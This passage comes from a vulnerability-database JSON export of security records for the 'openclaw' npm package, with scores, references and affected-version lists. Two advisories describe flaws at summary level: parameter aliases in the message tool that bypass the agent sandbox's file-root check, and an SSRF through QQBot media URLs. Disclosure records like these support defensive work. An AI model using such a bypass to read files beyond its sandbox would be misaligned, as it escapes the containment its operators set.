"VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43533", "GHSA-66r7-m7xm-v49h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9hcd-uj62-8yeu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90860?format=api", "vulnerability_id": "VCID-9jjv-aa8k-rke1", "summary": "OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n## Summary\n\nThe message tool accepted `mediaUrl` and `fileUrl` aliases without applying the same sandbox localRoots validation as the canonical media path handling.\n\n## Impact\n\nA caller constrained to sandbox media roots could read arbitrary local files by routing them through the alias parameters.\n\n## Affected Component\n\n`src/infra/outbound/message-action-params.ts, src/infra/outbound/message-action-runner.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.24`\n- Patched: `>= 2026.3.24`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `1d7cb6fc03` (`fix: close sandbox media root bypass for mediaUrl/fileUrl aliases`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33581", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17246", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17243", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19689", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33581" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters" }, { "reference_url": "https://github.com/advisories/GHSA-v8wv-jg3q-qwpq", "reference_id": "GHSA-v8wv-jg3q-qwpq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v8wv-jg3q-qwpq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-33581", "GHSA-v8wv-jg3q-qwpq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9jjv-aa8k-rke1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89809?format=api", "vulnerability_id": "VCID-9kgh-wj9w-ykff", "summary": "OpenClaw: QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes\n## Summary\n\nQQBot reply media URL handling could trigger SSRF and re-upload fetched bytes.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nQQBot reply media URLs could be treated as trusted media sources, allowing SSRF fetches whose returned bytes were then re-uploaded through the channel.\n\n## Technical Details\n\nThe fix routes QQBot remote media fetches through SSRF-guarded media fetching and explicit URL allowlist policy.\n\n## Fix\n\nThe issue was fixed in #63495 and #65788. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a`\n- `ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d`\n- PR: #63495, #65788\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @threalwinky for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43526", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12834", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14131", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14168", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43526" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63495", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63495" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/65788", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/65788" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43526", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43526" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling" }, { "reference_url": "https://github.com/advisories/GHSA-2767-2q9v-9326", "reference_id": "GHSA-2767-2q9v-9326", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2767-2q9v-9326" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api", "purl": "pkg:npm/openclaw@2026.4.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { 